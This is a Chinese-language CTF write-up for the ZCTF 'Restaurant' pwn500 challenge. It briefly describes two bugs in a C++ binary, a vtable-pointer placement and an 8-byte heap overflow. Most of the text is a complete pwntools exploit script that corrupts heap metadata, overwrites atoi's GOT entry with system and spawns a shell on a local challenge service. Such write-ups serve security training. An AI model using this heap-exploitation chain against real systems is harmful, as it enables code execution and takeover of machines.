ZCTF-Restaurant-Pwn500

版权声明：本文为博主原创文章，未经博主允许不得转载。

　这道压轴的题也是名副其实，很有分量。这也是自己第二次做C++类型的PWN。含有两个漏洞，缺一不可，一个漏洞将指定位置覆盖为对象虚表的地址，另外一个漏洞用来堆溢出(DW-Shoot)。

第一个漏洞所在位置：

第二个漏洞所在位置：如果连续对一种食物编辑评论，第二次则可以8字节的溢出，覆盖下一个堆块的堆头。

由于堆块在分配时的对齐策略，堆块分配后可以使用的内存可能比申请的要大。这道题目中，主食/主菜/汤都有3个种类，只有同时能选中主食的第二种，主菜的第二种才能溢出，而这个选择是随机的，POC所以并不能每次都成功，我这个POC成功的概率为1/9，其实多试几次就能顺利拿到shell。我大概试了3-4次就拿到了shell。上图：

 from pwn import *
 import time
 #by wangaohui
 #context.log_level = 'debug'

 s= remote('127.0.0.1',10001)
 time.sleep(2)
 print 'pid of restaurant is :' + str(pwnlib.util.proc.pidof('restaurant')[0])
 raw_input('go!')
 s.recvuntil('Please enter your name: ')
 s.sendline('/bin/sh;')
 s.recvuntil('you are the luckey ')
 heap = int(s.recvuntil('th guest.\n')[:-10])
 print 'heapaddr is %x' %heap
 s.recvuntil('Are you from China? (y/n) ')
 s.sendline('n')
 s.recvuntil('please enter your country: ');
 vtp = 0x404710
 data = 'a'*10 + '\x00' + 'a'*5 + '\x1c\x47\x40\x00'
 s.sendline(data)
 s.recvuntil('How old are you: ')
 s.sendline('')

 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('Successfully order a staple food, enjoy it!')

 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('Successfully order an entree, enjoy it!')
 '''
 s.recvuntil('8. Finish your order.')
 s.sendline('3')
 s.recvuntil('Successfully order a staple food, enjoy it!')
 '''

 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 s.sendline('')
 s.recvuntil('How does this dish look: ')
 s.sendline('xxx')
 s.recvuntil('How does this dish taste: ')
 s.sendline('yyy')

 fakefd = heap + 0x20
 fakebk = heap + 0x28
 appcom = 'a'*40 + p64(0x80) + p64(0x90)
 tastecom = p64(0x81) + p64(fakefd) + p64(fakebk)
 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 s.sendline('')
 s.recvuntil('How does this dish look: ')
 s.sendline(appcom)
 s.recvuntil('How does this dish taste: ')
 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('want to cancel(1,2 or 3 depend on menu): ')
 s.sendline('')
 s.recvuntil('the chef has already started to cook.')

 appcom = 'xxx'
 tastecom = p64(0x6060A0)#atoi's got
 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 s.sendline('')
 s.recvuntil('How does this dish look: ')
 s.sendline(appcom)
 s.recvuntil('How does this dish taste: ')
 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('Your age: ')
 atoiaddr = int(s.recvuntil('\n')[:-1])
 print 'atoiaddr is:  %x' % atoiaddr
 systemaddr = atoiaddr - 0x36360 + 0x414F0
 print 'systemaddr is:  %x' % systemaddr

 appcom = 'xxx'
 tastecom = 'a'*8 + p64(systemaddr)
 s.recvuntil('8. Finish your order.')
 s.sendline('')
 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 s.sendline('')
 s.recvuntil('How does this dish look: ')
 s.sendline(appcom)
 s.recvuntil('How does this dish taste: ')
 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')
 s.sendline('')

 s.recvuntil('3.Just so so!')
 s.sendline('3.Just so so!')
 s.recvuntil('Thank you for your comment,bye!')
 s.interactive()